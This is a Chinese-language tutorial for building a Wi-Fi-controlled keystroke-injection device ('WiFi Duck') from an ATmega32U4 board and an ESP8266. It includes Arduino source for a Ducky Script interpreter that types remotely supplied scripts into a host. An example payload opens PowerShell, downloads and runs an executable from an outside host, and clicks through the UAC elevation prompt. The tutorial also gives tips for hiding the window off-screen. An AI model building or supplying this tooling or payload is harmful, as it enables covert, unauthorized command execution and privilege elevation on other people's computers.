所需材料
1.CJMCU-Beetle Leonardo USB ATMEGA32U4
2.ESP8266-12F
3.AMS1117-3.3V电源模块
所需软件
ARDUINO IDE 下载地址:https://www.arduino.cc/en/Main/Software
NodeMCU Flasher 下载地址:https://github.com/nodemcu/nodemcu-flasher
操作步骤
1.ino
int program_pin = 12;  // driven LOW in setup(); presumably wired to the ESP8266's GPIO0 (boot-mode select) — confirm against the schematic
int enable_pin = 13;   // driven HIGH in setup(); presumably the ESP8266 EN/CH_PD line — confirm against the schematic
void setup() {
// Bring both links up at 115200 baud (the rate the NodeMCU flasher is used with
// in this tutorial) so loop() can copy bytes between them unchanged.
Serial1.begin(115200);
Serial.begin(115200);
// Put the ESP8266 into flash mode: program line held LOW, enable line driven HIGH.
// The order is deliberate: the program line is already low by the time enable
// goes high, so the module should come up in its UART bootloader. This assumes
// program_pin is GPIO0 and enable_pin is EN/CH_PD — confirm against the wiring.
pinMode(enable_pin, OUTPUT);
pinMode(program_pin, OUTPUT);
digitalWrite(program_pin, LOW);
digitalWrite(enable_pin, HIGH);
}
// Transparent serial bridge: ESP8266 UART (Serial1) <-> USB CDC (Serial).
// Each direction drains whatever is currently buffered, then yields.
// read() returns -1 when the buffer is empty, which ends each drain loop.
void loop() {
int c;
while ((c = Serial1.read()) >= 0) {
Serial.write((uint8_t) c);
}
while ((c = Serial.read()) >= 0) {
Serial1.write((uint8_t) c);
}
}
2.ino
#include <Keyboard.h>
#define BAUD_RATE 57200          // NOTE(review): non-standard rate; must match the ESP8266 firmware's UART speed exactly — confirm before changing
#define ExternSerial Serial1     // hardware UART wired to the ESP8266; USB CDC `Serial` is only used for debug echo
String bufferStr = "";           // raw script text received from the ESP8266, consumed line by line in loop()
String last = "";                // most recently executed script line, reused by REPLAY in Line()
int defaultDelay = 0;            // milliseconds appended after every line; set by DEFAULTDELAY
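// Execute one line of the duck script. Recognised forms:
//   STRING <text>        type <text> literally, one character at a time
//   DELAY <ms>           pause for <ms> milliseconds
//   DEFAULTDELAY <ms>    pause appended after every following line
//   REM <anything>       comment, ignored
//   REPLAY <n>           run the previously executed line (global `last`) n times
//   <key>                press one key (see Press())
//   <key> <key> ...      press the keys together as a combo, 5 ms apart
// Whatever was pressed is released at the end, then defaultDelay is applied.
// Fixes vs. the original: DELAY/REPLAY/DEFAULTDELAY values were truncated to a
// 16-bit int, so anything above 32767 (or negative) wrapped into a ~49-day
// delay() or a replay loop that spun until the int wrapped; and a REPLAY whose
// previous line was itself a REPLAY re-entered Line() without bound.
void Line(String _line)
{
int firstSpace = _line.indexOf(" ");
if (firstSpace == -1) {
Press(_line);
} else {
String cmd = _line.substring(0, firstSpace);
String arg = _line.substring(firstSpace + 1);
if (cmd == "STRING") {
// Keyboard.write() maps ASCII only; bytes outside that range will not type
// the intended glyph (no attempt is made to handle them here).
for (unsigned int i = 0; i < arg.length(); i++) Keyboard.write(arg[i]);
} else if (cmd == "DELAY") {
long ms = arg.toInt();   // toInt() yields long; keep it wide
if (ms > 0) delay(ms);   // delay() takes unsigned long: never hand it a negative
} else if (cmd == "DEFAULTDELAY") {
long ms = arg.toInt();
// defaultDelay is a global int; clamp instead of letting it wrap
defaultDelay = ms < 0 ? 0 : (ms > 32767 ? 32767 : (int) ms);
} else if (cmd == "REM") {
// comment line: nothing to do
} else if (cmd == "REPLAY") {
// If the previous line was itself a REPLAY, Line(last) would land back in
// this branch forever and overflow the AVR stack; treat that as a no-op.
if (!last.startsWith("REPLAY ")) {
long n = arg.toInt();
while (n > 0) {
Line(last);
--n;
}
}
} else {
// Key combination: press every space-separated token, holding them all.
String remain = _line;
while (remain.length() > 0) {
int sp = remain.indexOf(" ");
if (sp == -1) {
Press(remain);
remain = "";
} else {
Press(remain.substring(0, sp));
remain = remain.substring(sp + 1);
}
delay(5);
}
}
}
Keyboard.releaseAll();
if (defaultDelay > 0) delay(defaultDelay);
}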
// Press the key a script token names. A one-character token is pressed as
// that literal character; every longer token is resolved through the name
// table below (Keyboard.h constants). A token that matches nothing is
// silently ignored — nothing is pressed and nothing is reported.
// Keys stay down until the caller issues Keyboard.releaseAll().
void Press(String b) {
if (b.length() == 1) {
Keyboard.press(char(b[0]));
return;
}
struct NamedKey {
const char *name;
uint8_t code;
};
static const NamedKey KEYS[] = {
{"ENTER", KEY_RETURN},
{"CTRL", KEY_LEFT_CTRL},
{"SHIFT", KEY_LEFT_SHIFT},
{"ALT", KEY_LEFT_ALT},
{"GUI", KEY_LEFT_GUI},
{"UP", KEY_UP_ARROW}, {"UPARROW", KEY_UP_ARROW},
{"DOWN", KEY_DOWN_ARROW}, {"DOWNARROW", KEY_DOWN_ARROW},
{"LEFT", KEY_LEFT_ARROW}, {"LEFTARROW", KEY_LEFT_ARROW},
{"RIGHT", KEY_RIGHT_ARROW}, {"RIGHTARROW", KEY_RIGHT_ARROW},
{"DELETE", KEY_DELETE},
{"PAGEUP", KEY_PAGE_UP},
{"PAGEDOWN", KEY_PAGE_DOWN},
{"HOME", KEY_HOME},
{"ESC", KEY_ESC},
{"BACKSPACE", KEY_BACKSPACE},
{"INSERT", KEY_INSERT},
{"TAB", KEY_TAB},
{"END", KEY_END},
{"CAPSLOCK", KEY_CAPS_LOCK},
{"F1", KEY_F1}, {"F2", KEY_F2}, {"F3", KEY_F3}, {"F4", KEY_F4},
{"F5", KEY_F5}, {"F6", KEY_F6}, {"F7", KEY_F7}, {"F8", KEY_F8},
{"F9", KEY_F9}, {"F10", KEY_F10}, {"F11", KEY_F11}, {"F12", KEY_F12},
{"SPACE", ' '},
};
for (const NamedKey &k : KEYS) {
if (b.equals(k.name)) {
Keyboard.press(k.code);
return;
}
}
// Unknown token: deliberately a no-op (the original's debug print was commented out).
}
// Bring up the ESP8266 link and the USB debug link at the same rate, raise
// the ESP8266's enable line, and start emulating a USB keyboard.
void setup() {
ExternSerial.begin(BAUD_RATE);
Serial.begin(BAUD_RATE);
// Pin 13 is the line 1.ino drives as enable_pin; holding it HIGH keeps the module running.
pinMode(13, OUTPUT);
digitalWrite(13, HIGH);
Keyboard.begin();
}
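// Receive a script from the ESP8266, run it line by line, then acknowledge.
// readString() collects bytes until the stream's inter-byte timeout elapses
// (Stream's default of 1 s unless setTimeout() was called). That is what the
// original readStringUntil("END") effectively did as well: that overload takes
// a single char, so the pointer was truncated to an arbitrary byte and "END"
// was never a real terminator — a script containing that byte would have been
// cut short. NOTE(review): if the ESP firmware does append a literal END
// marker, it now reaches Line() and Press("END") presses the End key; strip
// it here once the ESP side's protocol is confirmed.
// NOTE(review): nothing on this UART is authenticated — every byte that
// arrives is typed into the host. Whatever gates the Wi-Fi side is the only
// control.
void loop() {
if (ExternSerial.available()) {
bufferStr = ExternSerial.readString();
Serial.println(bufferStr);
}
if (bufferStr.length() == 0) return;
// Normalise line endings: CR -> LF, then collapse the LFLF a CRLF turns into.
bufferStr.replace("\r", "\n");
bufferStr.replace("\n\n", "\n");
// `last` is updated after every executed line (the original skipped the final
// line when no newline followed it), so REPLAY behaves the same everywhere.
while (bufferStr.length() > 0) {
int nl = bufferStr.indexOf("\n");
if (nl == -1) {
Serial.println("run: " + bufferStr);
Line(bufferStr);
last = bufferStr;
bufferStr = "";
} else {
String line = bufferStr.substring(0, nl);
Serial.println("run: '" + line + "'");
Line(line);
last = line;
bufferStr = bufferStr.substring(nl + 1);
}
}
bufferStr = "";
// Completion byte the ESP8266 side waits for.
ExternSerial.write(0x99);
Serial.println("done");
}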
其实很简单,按电路图把三块板子连接起来,
装环境,找对端口,把1.ino上传,接着设备会重启,
再选择端口,把bin用NodeMCU Flasher刷进去,
断开设备,用电烙铁焊断红框中的那条线,再把设备插上去,
再用 Arduino IDE 上传 2.ino,过一会就能搜到名为 WiFi Duck 的热点,默认密码是 quackquack。这个密码是公开的默认值,而且 2.ino 对串口收到的脚本不做任何校验,谁连上热点就能往主机里打字,所以第一件事应该是改掉它,
管理IP和WIFI KILL一样是192.168.4.1,里面有DUCK Script 的语法介绍(没写全不过够用)
REM Example payload for the 2.ino interpreter above. Every line goes through
REM Line(), which treats a line starting with "REM " as a no-op.
DELAY 500
REM GUI maps to KEY_LEFT_GUI (the Windows key) in Press(), so this is Win and r.
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 500
REM Download the 360 installer into the temp directory ($env:TMP) as a.exe.
REM The string-concatenation operator is written as %2b because a literal plus
REM does not survive the web front end (see the note about view.htm below).
STRING (new-object System.net.WebClient).DownloadFile('https://dl.360safe.com/360/inst.exe',$env:TMP%2b'\a.exe')
DELAY 500
ENTER
REM Fixed 5 s wait for the download to finish; there is no completion check.
DELAY 5000
STRING cd $env:TMP
DELAY 500
ENTER
STRING ./a
DELAY 500
ENTER
DELAY 1000
REM LEFT then ENTER: presumably selects the confirm button on the elevation prompt.
LEFT
DELAY 500
ENTER
脚本执行后,PowerShell 会把 360 的安装包下载到临时目录并运行;末尾的 LEFT、ENTER 应该是用来确认提权(UAC)提示的,
也可以用 `ALT SPACE`、`M`、`LEFTARROW`、`REPLAY 100`(各占一行)把窗口移出屏幕藏起来。注意按键组合要用空格分隔、REPLAY 和次数之间也要有空格:2.ino 的解析器按第一个空格切分命令,`ALT+SPACE` 或 `REPLAY100` 这种写法会被当成未知按键直接忽略。
这个版本的 BIN 有个 BUG:加号、减号和一些符号打不出来。我看了下前后端的源码,
只要在view.htm下面的script加个正则过滤下就好了,
var ta = document.getElementById("scriptTextArea"); ta.value = ta.value.replace(/\+/g, '%2b');
(原文写的 replase 是笔误,/+?/ 也不是合法的正则;另外 replace 返回的是新字符串,要赋回 value 才生效)
如果懒得改前端,也可以直接在脚本里把打不出来的字符写成 URL 编码,比如上面脚本里就是用 %2b 代替 +,
翻不了墙的可以在这下